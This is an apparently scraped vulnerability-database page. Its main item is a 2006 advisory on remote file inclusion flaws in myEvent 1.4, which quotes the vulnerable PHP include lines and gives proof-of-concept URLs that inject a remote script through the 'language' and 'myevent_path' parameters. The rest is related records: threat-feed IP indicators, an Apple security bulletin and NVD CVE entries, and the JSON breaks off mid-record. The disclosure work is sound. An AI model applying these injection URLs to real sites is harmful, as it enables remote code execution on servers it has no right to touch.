Solution:
~~~~~~~~
Sanitize Variabel $language in admin.php & Sanitize Variabel $myevent_path in admin.php
event.php , initialize.php , myevent.php , viewevent.php
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
{"id": "SECURITYVULNS:DOC:13878", "bulletinFamily": "software", "title": "myEvent <= 1.4 Multiple Remote File Include Vulnerabilities", "description": "---------------------------------------------------------------------------------------\r\nmyEvent 1.4 Multiple Remote File Include Vulnerabilities\r\n---------------------------------------------------------------------------------------\r\nAuthor : Sh3ll\r\nDate : 2006/08/11\r\nHomePage : http://www.sh3ll.ir\r\nContact : sh3ll[at]sh3ll[dot]ir\r\n---------------------------------------------------------------------------------------\r\nAffected Software Description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nApplication : myEvent\r\nversion : 1.4\r\nVenedor : http://www.mywebland.com\r\nClass : Remote File Inclusion\r\nRisk : High\r\nSummary : \r\nmyEvent Is a Dynamic Calendar Based Events Management System.\r\n---------------------------------------------------------------------------------------\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\nin admin.php , event.php , initialize.php , myevent.php , viewevent.php We Found \r\nVulnerability Script\r\n----------------------------------------admin.php--------------------------------------\r\n....\r\n<?php\r\n include_once($language);\r\n ?>\r\n...\r\n----------------------------------------event.php--------------------------------------\r\n....\r\n<?php\r\n \r\n include_once $myevent_path."includes/template.php";\r\n ?>\r\n...\r\n--------------------------------------initialize.php-----------------------------------\r\n....\r\n<?php\r\n \r\n include $myevent_path."config.php";\r\n include $myevent_path.$language;\r\n include_once $myevent_path."includes/template.php"\r\n ?>\r\n...\r\n----------------------------------------myevent.php------------------------------------\r\n....\r\n<?php\r\n include_once $myevent_path."initialize.php";\r\n ?>\r\n...\r\n---------------------------------------viewevent.php-----------------------------------\r\n....\r\n<?php\r\n \r\n include_once $myevent_path."initialize.php";\r\n ?>\r\n...\r\n---------------------------------------------------------------------------------------\r\nPoC:\r\n~~~\r\nhttp://www.target.com/[myEvent]/admin.php?language=[Evil Script]\r\nhttp://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]\r\nhttp://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]\r\n\r\nSolution:\r\n~~~~~~~~\r\nSanitize Variabel $language in admin.php & Sanitize Variabel $myevent_path in admin.php\r\nevent.php , initialize.php , myevent.php , viewevent.php\r\n----------------------------------------------------------------------------------------\r\nNote:\r\n~~~~\r\nVenedor Contacted, But No Response. So Do a Dirty Patch.\r\n----------------------------------------------------------------------------------------\r\nShoutz:\r\n~~~~~~\r\n~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena\r\n~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams ", "published": "2006-08-14T00:00:00", "modified": "2006-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13878", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2017-13878", "CVE-2018-13878", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "apple", "idList": ["APPLE:HT208331"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-13878"]}, {"type": "nessus", "idList": ["SUSE_SU-2018-3879-1.NASL", "MACOS_10_13_2.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43780"]}, {"type": "zdt", "idList": ["1337DAY-ID-29581"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812400", "OPENVAS:1361412562310812408"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 6.6}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **200[.]189.180.99** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 200.189.160.0, Last IP 200.189.191.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:F5C89A96-63D8-32F6-A802-C13B4517A2F7", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 200.189.180.99", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **103[.]112.209.136** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 137547: (First IP 103.112.208.0, Last IP 103.112.211.255).\nASN Name \"LLKITASAP\" and Organisation \"Zhengzhou Lulinke Information Technology COLtd\".\nASN hosts 13878 domains.\nGEO IP information: City \"\", Country \"China\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:4EACB6D2-AE2F-3D0E-B128-F4763C8EC0B4", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 103.112.209.136", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **201[.]77.222.27** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 201.77.192.0, Last IP 201.77.225.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:5210097D-92EA-39BD-BF8C-24164987A076", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 201.77.222.27", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **189[.]36.1.114** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **35**.\n First seen: 2020-08-12T03:00:00, Last seen: 2020-09-04T03:00:00.\n IOC tags: **generic**.\nASN 13878: (First IP 189.36.0.0, Last IP 189.36.8.255).\nASN Name \"UOL\" and Organisation \"DIVEO SA\".\nASN hosts 1693 domains.\nGEO IP information: City \"Santo Andr\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-12T00:00:00", "id": "RST:228D780C-7993-3068-A3A6-EC7B182403D0", "href": "", "published": "2020-09-06T00:00:00", "title": "RST Threat feed. IOC: 189.36.1.114", "type": "rst", "cvss": {}}], "apple": [{"lastseen": "2020-12-24T20:41:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 3, "modified": "2020-07-27T08:21:38", "published": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:34", "description": "An XSS issue was discovered in packages/rocketchat-mentions/Mentions.js in Rocket.Chat before 0.65. The real name of a username is displayed unescaped when the user is mentioned (using the @ symbol) in a channel or private chat. Consequently, it is possible to exfiltrate the secret token of every user and also admins in the channel.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-07-11T01:29:00", "title": "CVE-2018-13878", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13878"], "modified": "2018-09-05T16:34:00", "cpe": [], "id": "CVE-2018-13878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13878", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:22", "description": "An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the \"Intel Graphics Driver\" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (out-of-bounds read and system crash).", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-12-25T21:29:00", "title": "CVE-2017-13878", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": 